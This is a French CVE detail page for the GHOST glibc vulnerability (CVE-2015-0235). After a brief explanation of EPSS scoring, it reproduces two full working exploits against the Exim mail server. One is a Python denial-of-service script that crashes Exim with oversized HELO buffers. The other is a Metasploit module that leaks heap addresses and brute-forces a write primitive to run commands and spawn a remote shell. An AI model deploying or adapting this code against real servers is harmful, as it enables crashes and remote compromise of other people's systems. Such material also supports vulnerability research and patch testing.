CVE-2015-0235 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

# Exploit Title: [Exim ESMTP GHOST DoS PoC Exploit] # Date: [1/29/2015] # Exploit Author: [1N3] # Vendor Homepage: [www.exim.org] # Version: [4.80 or less] # Tested on: [debian-7-7-64b] # CVE : [2015-0235] #!/usr/bin/python # Exim ESMTP DoS Exploit by 1N3 v20150128 # CVE-2015-0235 GHOST glibc gethostbyname buffer overflow # http://crowdshield.com # # USAGE: python ghost-smtp-dos.py <ip> <port> # # Escape character is '^]'. # 220 debian-7-7-64b ESMTP Exim 4.80 ... # HELO # 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 # Connection closed by foreign host. # # user () debian-7-7-64b:~$ dmesg # ... # [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in # libc-2.13.so[7fabef2a2000+182000] import socket import time import sys, getopt def main(argv): argc = len(argv) if argc <= 1: print "usage: %s <host>" % (argv[0]) sys.exit(0) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) buffer = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" target = argv[1] # SET TARGET port = argv[2] # SET PORT print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com" print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer)) s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((target,int(port))) data = s.recv(1024) print "CONNECTION: " +data s.send('HELO ' + buffer + '\r\n') data = s.recv(1024) print "received: " +data s.send('EHLO ' + buffer + '\r\n') data = s.recv(1024) print "received: " +data s.close() main(sys.argv)

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Exim GHOST (glibc gethostbyname) Buffer Overflow', 'Description' => %q( This module remotely exploits CVE-2015-0235 (a.k.a. GHOST, a heap-based buffer overflow in the GNU C Library's gethostbyname functions) on x86 and x86_64 GNU/Linux systems that run the Exim mail server. Technical information about the exploitation can be found in the original GHOST advisory, and in the source code of this module. ------------------------------------------------------------------------ SERVER-SIDE REQUIREMENTS (Exim) ------------------------------------------------------------------------ The remote system must use a vulnerable version of the GNU C Library: the first exploitable version is glibc-2.6, the last exploitable version is glibc-2.17; older versions might be exploitable too, but this module depends on the newer versions' fd_nextsize (a member of the malloc_chunk structure) to remotely obtain the address of Exim's smtp_cmd_buffer in the heap. ------------------------------------------------------------------------ The remote system must run the Exim mail server: the first exploitable version is exim-4.77; older versions might be exploitable too, but this module depends on the newer versions' 16-KB smtp_cmd_buffer to reliably set up the heap as described in the GHOST advisory. ------------------------------------------------------------------------ The remote Exim mail server must be configured to perform extra security checks against its SMTP clients: either the helo_try_verify_hosts or the helo_verify_hosts option must be enabled; the "verify = helo" ACL might be exploitable too, but is unpredictable and therefore not supported by this module. ------------------------------------------------------------------------ CLIENT-SIDE REQUIREMENTS (Metasploit) ------------------------------------------------------------------------ This module's "exploit" method requires the SENDER_HOST_ADDRESS option to be set to the IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim); additionally, this IPv4 address must have both forward and reverse DNS entries that match each other (Forward-Confirmed reverse DNS). ------------------------------------------------------------------------ The remote Exim server might be exploitable even if the Metasploit client has no FCrDNS, but this module depends on Exim's sender_host_name variable to be set in order to reliably control the state of the remote heap. ------------------------------------------------------------------------ TROUBLESHOOTING ------------------------------------------------------------------------ "bad SENDER_HOST_ADDRESS (nil)" failure: the SENDER_HOST_ADDRESS option was not specified. ------------------------------------------------------------------------ "bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)" failure: the SENDER_HOST_ADDRESS option was specified, but not in IPv4 dotted-decimal notation. ------------------------------------------------------------------------ "bad SENDER_HOST_ADDRESS (helo_verify_hosts)" or "bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)" failure: the SENDER_HOST_ADDRESS option does not match the IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim). ------------------------------------------------------------------------ "bad SENDER_HOST_ADDRESS (no FCrDNS)" failure: the IPv4 address of the SMTP client (Metasploit) has no Forward-Confirmed reverse DNS. ------------------------------------------------------------------------ "not vuln? old glibc? (no leaked_arch)" failure: the remote Exim server is either not vulnerable, or not exploitable (glibc versions older than glibc-2.6 have no fd_nextsize member in their malloc_chunk structure). ------------------------------------------------------------------------ "NUL, CR, LF in addr? (no leaked_addr)" failure: Exim's heap address contains bad characters (NUL, CR, LF) and was therefore mangled during the information leak; this exploit is able to reconstruct most of these addresses, but not all (worst-case probability is ~1/85, but could be further improved). ------------------------------------------------------------------------ "Brute-force SUCCESS" followed by a nil reply, but no shell: the remote Unix command was executed, but spawned a bind-shell or a reverse-shell that failed to connect (maybe because of a firewall, or a NAT, etc). ------------------------------------------------------------------------ "Brute-force SUCCESS" followed by a non-nil reply, and no shell: the remote Unix command was executed, but failed to spawn the shell (maybe because the setsid command doesn't exist, or awk isn't gawk, or netcat doesn't support the -6 or -e option, or telnet doesn't support the -z option, etc). ------------------------------------------------------------------------ Comments and questions are welcome! ), 'Author' => ['Qualys, Inc. <qsa[at]qualys.com>'], 'License' => BSD_LICENSE, 'References' => [ ['CVE', '2015-0235'], ['US-CERT-VU', '967332'], ['OSVDB', '117579'], ['BID', '72325'], ['URL', 'https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt'] ], 'DisclosureDate' => 'Jan 27 2015', 'Privileged' => false, # uid=101(Debian-exim) gid=103(Debian-exim) groups=103(Debian-exim) 'Platform' => 'unix', # actually 'linux', but we execute a unix-command payload 'Arch' => ARCH_CMD, # actually [ARCH_X86, ARCH_X86_64], but ^ 'Payload' => { 'Space' => 255, # the shorter the payload, the higher the probability of code execution 'BadChars' => "", # we encode the payload ourselves, because ^ 'DisableNops' => true, 'ActiveTimeout' => 24*60*60 # we may need more than 150 s to execute our bind-shell }, 'Targets' => [['Automatic', {}]], 'DefaultTarget' => 0 )) register_options([ Opt::RPORT(25), OptAddress.new('SENDER_HOST_ADDRESS', [false, 'The IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim)', nil]) ], self.class) register_advanced_options([ OptBool.new('I_KNOW_WHAT_I_AM_DOING', [false, 'Please read the source code for details', nil]) ], self.class) end def check # for now, no information about the vulnerable state of the target check_code = Exploit::CheckCode::Unknown begin # not exploiting, just checking smtp_connect(false) # malloc()ate gethostbyname's buffer, and # make sure its next_chunk isn't the top chunk 9.times do smtp_send("HELO ", "", "0", "", "", 1024+16-1+0) smtp_recv(HELO_CODES) end # overflow (4 bytes) gethostbyname's buffer, and # overwrite its next_chunk's size field with 0x00303030 smtp_send("HELO ", "", "0", "", "", 1024+16-1+4) # from now on, an exception means vulnerable check_code = Exploit::CheckCode::Vulnerable # raise an exception if no valid SMTP reply reply = smtp_recv(ANY_CODE) # can't determine vulnerable state if smtp_verify_helo() isn't called return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/ # realloc()ate gethostbyname's buffer, and # crash (old glibc) or abort (new glibc) # on the overwritten size field smtp_send("HELO ", "", "0", "", "", 2048-16-1+4) # raise an exception if no valid SMTP reply reply = smtp_recv(ANY_CODE) # can't determine vulnerable state if smtp_verify_helo() isn't called return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/ # a vulnerable target should've crashed by now check_code = Exploit::CheckCode::Safe rescue peer = "#{rhost}:#{rport}" vprint_debug("#{peer} - Caught #{$!.class}: #{$!.message}") ensure smtp_disconnect end return check_code end def exploit unless datastore['I_KNOW_WHAT_I_AM_DOING'] print_status("Checking if target is vulnerable...") fail_with("exploit", "Vulnerability check failed.") if check != Exploit::CheckCode::Vulnerable print_good("Target is vulnerable.") end information_leak code_execution end private HELO_CODES = '250|451|550' ANY_CODE = '[0-9]{3}' MIN_HEAP_SHIFT = 80 MIN_HEAP_SIZE = 128 * 1024 MAX_HEAP_SIZE = 1024 * 1024 # Exim ALIGNMENT = 8 STORE_BLOCK_SIZE = 8192 STOREPOOL_MIN_SIZE = 256 LOG_BUFFER_SIZE = 8192 BIG_BUFFER_SIZE = 16384 SMTP_CMD_BUFFER_SIZE = 16384 IN_BUFFER_SIZE = 8192 # GNU C Library PREV_INUSE = 0x1 NS_MAXDNAME = 1025 # Linux MMAP_MIN_ADDR = 65536 def information_leak print_status("Trying information leak...") leaked_arch = nil leaked_addr = [] # try different heap_shift values, in case Exim's heap address contains # bad chars (NUL, CR, LF) and was mangled during the information leak; # we'll keep the longest one (the least likely to have been truncated) 16.times do done = catch(:another_heap_shift) do heap_shift = MIN_HEAP_SHIFT + (rand(1024) & ~15) print_debug("#{{ heap_shift: heap_shift }}") # write the malloc_chunk header at increasing offsets (8-byte step), # until we overwrite the "503 sender not yet given" error message 128.step(256, 8) do |write_offset| error = try_information_leak(heap_shift, write_offset) print_debug("#{{ write_offset: write_offset, error: error }}") throw(:another_heap_shift) if not error next if error == "503 sender not yet given" # try a few more offsets (allows us to double-check things, # and distinguish between 32-bit and 64-bit machines) error = [error] 1.upto(5) do |i| error[i] = try_information_leak(heap_shift, write_offset + i*8) throw(:another_heap_shift) if not error[i] end print_debug("#{{ error: error }}") _leaked_arch = leaked_arch if (error[0] == error[1]) and (error[0].empty? or (error[0].unpack('C')[0] & 7) == 0) and # fd_nextsize (error[2] == error[3]) and (error[2].empty? or (error[2].unpack('C')[0] & 7) == 0) and # fd (error[4] =~ /\A503 send[^e].?\z/mn) and ((error[4].unpack('C*')[8] & 15) == PREV_INUSE) and # size (error[5] == "177") # the last \x7F of our BAD1 command, encoded as \\177 by string_printing() leaked_arch = ARCH_X86_64 elsif (error[0].empty? or (error[0].unpack('C')[0] & 3) == 0) and # fd_nextsize (error[1].empty? or (error[1].unpack('C')[0] & 3) == 0) and # fd (error[2] =~ /\A503 [^s].?\z/mn) and ((error[2].unpack('C*')[4] & 7) == PREV_INUSE) and # size (error[3] == "177") # the last \x7F of our BAD1 command, encoded as \\177 by string_printing() leaked_arch = ARCH_X86 else throw(:another_heap_shift) end print_debug("#{{ leaked_arch: leaked_arch }}") fail_with("infoleak", "arch changed") if _leaked_arch and _leaked_arch != leaked_arch # try different large-bins: most of them should be empty, # so keep the most frequent fd_nextsize address # (a pointer to the malloc_chunk itself) count = Hash.new(0) 0.upto(9) do |last_digit| error = try_information_leak(heap_shift, write_offset, last_digit) next if not error or error.length < 2 # heap_shift can fix the 2 least significant NUL bytes next if (error.unpack('C')[0] & (leaked_arch == ARCH_X86 ? 7 : 15)) != 0 # MALLOC_ALIGN_MASK count[error] += 1 end print_debug("#{{ count: count }}") throw(:another_heap_shift) if count.empty? # convert count to a nested array of [key, value] arrays and sort it error_count = count.sort { |a, b| b[1] <=> a[1] } error_count = error_count.first # most frequent error = error_count[0] count = error_count[1] throw(:another_heap_shift) unless count >= 6 # majority leaked_addr.push({ error: error, shift: heap_shift }) # common-case shortcut if (leaked_arch == ARCH_X86 and error[0,4] == error[4,4] and error[8..-1] == "er not yet given") or (leaked_arch == ARCH_X86_64 and error.length == 6 and error[5].count("\x7E-\x7F").nonzero?) leaked_addr = [leaked_addr.last] # use this one, and not another throw(:another_heap_shift, true) # done end throw(:another_heap_shift) end throw(:another_heap_shift) end break if done end fail_with("infoleak", "not vuln? old glibc? (no leaked_arch)") if leaked_arch.nil? fail_with("infoleak", "NUL, CR, LF in addr? (no leaked_addr)") if leaked_addr.empty? leaked_addr.sort! { |a, b| b[:error].length <=> a[:error].length } leaked_addr = leaked_addr.first # longest error = leaked_addr[:error] shift = leaked_addr[:shift] leaked_addr = 0 (leaked_arch == ARCH_X86 ? 4 : 8).times do |i| break if i >= error.length leaked_addr += error.unpack('C*')[i] * (2**(i*8)) end # leaked_addr should point to the beginning of Exim's smtp_cmd_buffer: leaked_addr -= 2*SMTP_CMD_BUFFER_SIZE + IN_BUFFER_SIZE + 4*(11*1024+shift) + 3*1024 + STORE_BLOCK_SIZE fail_with("infoleak", "NUL, CR, LF in addr? (no leaked_addr)") if leaked_addr <= MMAP_MIN_ADDR print_good("Successfully leaked_arch: #{leaked_arch}") print_good("Successfully leaked_addr: #{leaked_addr.to_s(16)}") @leaked = { arch: leaked_arch, addr: leaked_addr } end def try_information_leak(heap_shift, write_offset, last_digit = 9) fail_with("infoleak", "heap_shift") if (heap_shift < MIN_HEAP_SHIFT) fail_with("infoleak", "heap_shift") if (heap_shift & 15) != 0 fail_with("infoleak", "write_offset") if (write_offset & 7) != 0 fail_with("infoleak", "last_digit") if "#{last_digit}" !~ /\A[0-9]\z/ smtp_connect # bulletproof Heap Feng Shui; the hard part is avoiding: # "Too many syntax or protocol errors" (3) # "Too many unrecognized commands" (3) # "Too many nonmail commands" (10) smtp_send("HELO ", "", "0", @sender[:hostaddr8], "", 11*1024+13-1 + heap_shift) smtp_recv(250) smtp_send("HELO ", "", "0", @sender[:hostaddr8], "", 3*1024+13-1) smtp_recv(250) smtp_send("HELO ", "", "0", @sender[:hostaddr8], "", 3*1024+16+13-1) smtp_recv(250) smtp_send("HELO ", "", "0", @sender[:hostaddr8], "", 8*1024+16+13-1) smtp_recv(250) smtp_send("HELO ", "", "0", @sender[:hostaddr8], "", 5*1024+16+13-1) smtp_recv(250) # overflow (3 bytes) gethostbyname's buffer, and # overwrite its next_chunk's size field with 0x003?31 # ^ last_digit smtp_send("HELO ", "", "0", ".1#{last_digit}", "", 12*1024+3-1 + heap_shift-MIN_HEAP_SHIFT) begin # ^ 0x30 | PREV_INUSE smtp_recv(HELO_CODES) smtp_send("RSET") smtp_recv(250) smtp_send("RCPT TO:", "", method(:rand_text_alpha), "\x7F", "", 15*1024) smtp_recv(503, 'sender not yet given') smtp_send("", "BAD1 ", method(:rand_text_alpha), "\x7F\x7F\x7F\x7F", "", 10*1024-16-1 + write_offset) smtp_recv(500, '\A500 unrecognized command\r\n\z') smtp_send("BAD2 ", "", method(:rand_text_alpha), "\x7F", "", 15*1024) smtp_recv(500, '\A500 unrecognized command\r\n\z') smtp_send("DATA") reply = smtp_recv(503) lines = reply[:lines] fail if lines.size <= 3 fail if lines[+0] != "503-All RCPT commands were rejected with this error:\r\n" fail if lines[-2] != "503-valid RCPT command must precede DATA\r\n" fail if lines[-1] != "503 Too many syntax or protocol errors\r\n" # if leaked_addr contains LF, reverse smtp_respond()'s multiline splitting # (the "while (isspace(*msg)) msg++;" loop can't be easily reversed, # but happens with lower probability) error = lines[+1..-3].join("") error.sub!(/\A503-/mn, "") error.sub!(/\r\n\z/mn, "") error.gsub!(/\r\n503-/mn, "\n") return error rescue return nil end ensure smtp_disconnect end def code_execution print_status("Trying code execution...") # can't "${run{/bin/sh -c 'exec /bin/sh -i <&#{b} >&0 2>&0'}} " anymore: # DW/26 Set FD_CLOEXEC on SMTP sockets after forking in the daemon, to ensure # that rogue child processes cannot use them. fail_with("codeexec", "encoded payload") if payload.raw != payload.encoded fail_with("codeexec", "invalid payload") if payload.raw.empty? or payload.raw.count("^\x20-\x7E").nonzero? # Exim processes our run-ACL with expand_string() first (hence the [\$\{\}\\] escapes), # and transport_set_up_command(), string_dequote() next (hence the [\"\\] escapes). encoded = payload.raw.gsub(/[\"\\]/, '\\\\\\&').gsub(/[\$\{\}\\]/, '\\\\\\&') # setsid because of Exim's "killpg(pid, SIGKILL);" after "alarm(60);" command = '${run{/usr/bin/env setsid /bin/sh -c "' + encoded + '"}}' print_debug(command) # don't try to execute commands directly, try a very simple ACL first, # to distinguish between exploitation-problems and shellcode-problems acldrop = "drop message=" message = rand_text_alpha(command.length - acldrop.length) acldrop += message max_rand_offset = (@leaked[:arch] == ARCH_X86 ? 32 : 64) max_heap_addr = @leaked[:addr] min_heap_addr = nil survived = nil # we later fill log_buffer and big_buffer with alpha chars, # which creates a safe-zone at the beginning of the heap, # where we can't possibly crash during our brute-force # 4, because 3 copies of sender_helo_name, and step_len; # start big, but refine little by little in case # we crash because we overwrite important data helo_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) / 4 loop do sender_helo_name = "A" * helo_len address = sprintf("[%s]:%d", @sender[:hostaddr], 65535) # the 3 copies of sender_helo_name, allocated by # host_build_sender_fullhost() in POOL_PERM memory helo_ip_size = ALIGNMENT + sender_helo_name[+1..-2].length sender_fullhost_size = ALIGNMENT + sprintf("%s (%s) %s", @sender[:hostname], sender_helo_name, address).length sender_rcvhost_size = ALIGNMENT + ((@sender[:ident] == nil) ? sprintf("%s (%s helo=%s)", @sender[:hostname], address, sender_helo_name) : sprintf("%s\n\t(%s helo=%s ident=%s)", @sender[:hostname], address, sender_helo_name, @sender[:ident]) ).length # fit completely into the safe-zone step_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) - (max_rand_offset + helo_ip_size + sender_fullhost_size + sender_rcvhost_size) loop do # inside smtp_cmd_buffer (we later fill smtp_cmd_buffer and smtp_data_buffer # with alpha chars, which creates another safe-zone at the end of the heap) heap_addr = max_heap_addr loop do # try harder the first time around: we obtain better # heap boundaries, and we usually hit our ACL faster (min_heap_addr ? 1 : 2).times do # try the same heap_addr several times, but with different random offsets, # in case we crash because our hijacked storeblock's length field is too small # (we don't control what's stored at heap_addr) rand_offset = rand(max_rand_offset) print_debug("#{{ helo: helo_len, step: step_len, addr: heap_addr.to_s(16), offset: rand_offset }}") reply = try_code_execution(helo_len, acldrop, heap_addr + rand_offset) print_debug("#{{ reply: reply }}") if reply if reply and reply[:code] == "550" and # detect the parsed ACL, not the "still in text form" ACL (with "=") reply[:lines].join("").delete("^=A-Za-z") =~ /(\A|[^=])#{message}/mn print_good("Brute-force SUCCESS") print_good("Please wait for reply...") # execute command this time, not acldrop reply = try_code_execution(helo_len, command, heap_addr + rand_offset) print_debug("#{{ reply: reply }}") return handler end if not min_heap_addr if reply fail_with("codeexec", "no min_heap_addr") if (max_heap_addr - heap_addr) >= MAX_HEAP_SIZE survived = heap_addr else if ((survived ? survived : max_heap_addr) - heap_addr) >= MIN_HEAP_SIZE # survived should point to our safe-zone at the beginning of the heap fail_with("codeexec", "never survived") if not survived print_good "Brute-forced min_heap_addr: #{survived.to_s(16)}" min_heap_addr = survived end end end end heap_addr -= step_len break if min_heap_addr and heap_addr < min_heap_addr end break if step_len < 1024 step_len /= 2 end helo_len /= 2 break if helo_len < 1024 # ^ otherwise the 3 copies of sender_helo_name will # fit into the current_block of POOL_PERM memory end fail_with("codeexec", "Brute-force FAILURE") end # our write-what-where primitive def try_code_execution(len, what, where) fail_with("codeexec", "#{what.length} >= #{len}") if what.length >= len fail_with("codeexec", "#{where} < 0") if where < 0 x86 = (@leaked[:arch] == ARCH_X86) min_heap_shift = (x86 ? 512 : 768) # at least request2size(sizeof(FILE)) heap_shift = min_heap_shift + rand(1024 - min_heap_shift) last_digit = 1 + rand(9) smtp_connect # fill smtp_cmd_buffer, smtp_data_buffer, and big_buffer with alpha chars smtp_send("MAIL FROM:", "", method(:rand_text_alpha), "<#{rand_text_alpha_upper(8)}>", "", BIG_BUFFER_SIZE - "501 : sender address must contain a domain\r\n\0".length) smtp_recv(501, 'sender address must contain a domain') smtp_send("RSET") smtp_recv(250) # bulletproof Heap Feng Shui; the hard part is avoiding: # "Too many syntax or protocol errors" (3) # "Too many unrecognized commands" (3) # "Too many nonmail commands" (10) # / 5, because "\x7F" is non-print, and: # ss = store_get(length + nonprintcount * 4 + 1); smtp_send("BAD1 ", "", "\x7F", "", "", (19*1024 + heap_shift) / 5) smtp_recv(500, '\A500 unrecognized command\r\n\z') smtp_send("HELO ", "", "0", @sender[:hostaddr8], "", 5*1024+13-1) smtp_recv(250) smtp_send("HELO ", "", "0", @sender[:hostaddr8], "", 3*1024+13-1) smtp_recv(250) smtp_send("BAD2 ", "", "\x7F", "", "", (13*1024 + 128) / 5) smtp_recv(500, '\A500 unrecognized command\r\n\z') smtp_send("HELO ", "", "0", @sender[:hostaddr8], "", 3*1024+16+13-1) smtp_recv(250) # overflow (3 bytes) gethostbyname's buffer, and # overwrite its next_chunk's size field with 0x003?31 # ^ last_digit smtp_send("EHLO ", "", "0", ".1#{last_digit}", "", 5*1024+64+3-1) smtp_recv(HELO_CODES) # ^ 0x30 | PREV_INUSE # auth_xtextdecode() is the only way to overwrite the beginning of a # current_block of memory (the "storeblock" structure) with arbitrary data # (so that our hijacked "next" pointer can contain NUL, CR, LF characters). # this shapes the rest of our exploit: we overwrite the beginning of the # current_block of POOL_PERM memory with the current_block of POOL_MAIN # memory (allocated by auth_xtextdecode()). auth_prefix = rand_text_alpha(x86 ? 11264 : 11280) (x86 ? 4 : 8).times { |i| auth_prefix += sprintf("+%02x", (where >> (i*8)) & 255) } auth_prefix += "." # also fill log_buffer with alpha chars smtp_send("MAIL FROM:<> AUTH=", auth_prefix, method(:rand_text_alpha), "+", "", 0x3030) smtp_recv(501, 'invalid data for AUTH') smtp_send("HELO ", "[1:2:3:4:5:6:7:8%eth0:", " ", "#{what}]", "", len) begin reply = smtp_recv(ANY_CODE) return reply if reply[:code] !~ /#{HELO_CODES}/ return reply if reply[:code] != "250" and reply[:lines].first !~ /argument does not match calling host/ smtp_send("MAIL FROM:<>") reply = smtp_recv(ANY_CODE) return reply if reply[:code] != "250" smtp_send("RCPT TO:<postmaster>") reply = smtp_recv return reply rescue return nil end ensure smtp_disconnect end DIGITS = '([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])' DOT = '[.]' def smtp_connect(exploiting = true) fail_with("smtp_connect", "sock isn't nil") if sock connect fail_with("smtp_connect", "sock is nil") if not sock @smtp_state = :recv banner = smtp_recv(220) return if not exploiting sender_host_address = datastore['SENDER_HOST_ADDRESS'] if sender_host_address !~ /\A#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}\z/ fail_with("smtp_connect", "bad SENDER_HOST_ADDRESS (nil)") if sender_host_address.nil? fail_with("smtp_connect", "bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)") end sender_host_address_octal = "0" + $1.to_i.to_s(8) + ".#{$2}.#{$3}.#{$4}" # turn helo_seen on (enable the MAIL command) # call smtp_verify_helo() (force fopen() and small malloc()s) # call host_find_byname() (force gethostbyname's initial 1024-byte malloc()) smtp_send("HELO #{sender_host_address_octal}") reply = smtp_recv(HELO_CODES) if reply[:code] != "250" fail_with("smtp_connect", "not Exim?") if reply[:lines].first !~ /argument does not match calling host/ fail_with("smtp_connect", "bad SENDER_HOST_ADDRESS (helo_verify_hosts)") end if reply[:lines].first =~ /\A250 (\S*) Hello (.*) \[(\S*)\]\r\n\z/mn fail_with("smtp_connect", "bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)") if sender_host_address != $3 smtp_active_hostname = $1 sender_host_name = $2 if sender_host_name =~ /\A(.*) at (\S*)\z/mn sender_host_name = $2 sender_ident = $1 else sender_ident = nil end fail_with("smtp_connect", "bad SENDER_HOST_ADDRESS (no FCrDNS)") if sender_host_name == sender_host_address_octal else # can't double-check sender_host_address here, so only for advanced users fail_with("smtp_connect", "user-supplied EHLO greeting") unless datastore['I_KNOW_WHAT_I_AM_DOING'] # worst-case scenario smtp_active_hostname = "A" * NS_MAXDNAME sender_host_name = "A" * NS_MAXDNAME sender_ident = "A" * 127 * 4 # sender_ident = string_printing(string_copyn(p, 127)); end _sender = @sender @sender = { hostaddr: sender_host_address, hostaddr8: sender_host_address_octal, hostname: sender_host_name, ident: sender_ident, __smtp_active_hostname: smtp_active_hostname } fail_with("smtp_connect", "sender changed") if _sender and _sender != @sender # avoid a future pathological case by forcing it now: # "Do NOT free the first successor, if our current block has less than 256 bytes left." smtp_send("MAIL FROM:", "<", method(:rand_text_alpha), ">", "", STOREPOOL_MIN_SIZE + 16) smtp_recv(501, 'sender address must contain a domain') smtp_send("RSET") smtp_recv(250, 'Reset OK') end def smtp_send(prefix, arg_prefix = nil, arg_pattern = nil, arg_suffix = nil, suffix = nil, arg_length = nil) fail_with("smtp_send", "state is #{@smtp_state}") if @smtp_state != :send @smtp_state = :sending if not arg_pattern fail_with("smtp_send", "prefix is nil") if not prefix fail_with("smtp_send", "param isn't nil") if arg_prefix or arg_suffix or suffix or arg_length command = prefix else fail_with("smtp_send", "param is nil") unless prefix and arg_prefix and arg_suffix and suffix and arg_length length = arg_length - arg_prefix.length - arg_suffix.length fail_with("smtp_send", "len is #{length}") if length <= 0 argument = arg_prefix case arg_pattern when String argument += arg_pattern * (length / arg_pattern.length) argument += arg_pattern[0, length % arg_pattern.length] when Method argument += arg_pattern.call(length) end argument += arg_suffix fail_with("smtp_send", "arglen is #{argument.length}, not #{arg_length}") if argument.length != arg_length command = prefix + argument + suffix end fail_with("smtp_send", "invalid char in cmd") if command.count("^\x20-\x7F") > 0 fail_with("smtp_send", "cmdlen is #{command.length}") if command.length > SMTP_CMD_BUFFER_SIZE command += "\n" # RFC says CRLF, but squeeze as many chars as possible in smtp_cmd_buffer # the following loop works around a bug in the put() method: # "while (send_idx < send_len)" should be "while (send_idx < buf.length)" # (or send_idx and/or send_len could be removed altogether, like here) while command and not command.empty? num_sent = sock.put(command) fail_with("smtp_send", "sent is #{num_sent}") if num_sent <= 0 fail_with("smtp_send", "sent is #{num_sent}, greater than #{command.length}") if num_sent > command.length command = command[num_sent..-1] end @smtp_state = :recv end def smtp_recv(expected_code = nil, expected_data = nil) fail_with("smtp_recv", "state is #{@smtp_state}") if @smtp_state != :recv @smtp_state = :recving failure = catch(:failure) do # parse SMTP replies very carefully (the information # leak injects arbitrary data into multiline replies) data = "" while data !~ /(\A|\r\n)[0-9]{3}[ ].*\r\n\z/mn begin more_data = sock.get_once rescue throw(:failure, "Caught #{$!.class}: #{$!.message}") end throw(:failure, "no more data") if more_data.nil? throw(:failure, "no more data") if more_data.empty? data += more_data end throw(:failure, "malformed reply (count)") if data.count("\0") > 0 lines = data.scan(/(?:\A|\r\n)[0-9]{3}[ -].*?(?=\r\n(?=[0-9]{3}[ -]|\z))/mn) throw(:failure, "malformed reply (empty)") if lines.empty? code = nil lines.size.times do |i| lines[i].sub!(/\A\r\n/mn, "") lines[i] += "\r\n" if i == 0 code = lines[i][0,3] throw(:failure, "bad code") if code !~ /\A[0-9]{3}\z/mn if expected_code and code !~ /\A(#{expected_code})\z/mn throw(:failure, "unexpected #{code}, expected #{expected_code}") end end line_begins_with = lines[i][0,4] line_should_begin_with = code + (i == lines.size-1 ? " " : "-") if line_begins_with != line_should_begin_with throw(:failure, "line begins with #{line_begins_with}, " \ "should begin with #{line_should_begin_with}") end end throw(:failure, "malformed reply (join)") if lines.join("") != data if expected_data and data !~ /#{expected_data}/mn throw(:failure, "unexpected data") end reply = { code: code, lines: lines } @smtp_state = :send return reply end fail_with("smtp_recv", "#{failure}") if expected_code return nil end def smtp_disconnect disconnect if sock fail_with("smtp_disconnect", "sock isn't nil") if sock @smtp_state = :disconnected end end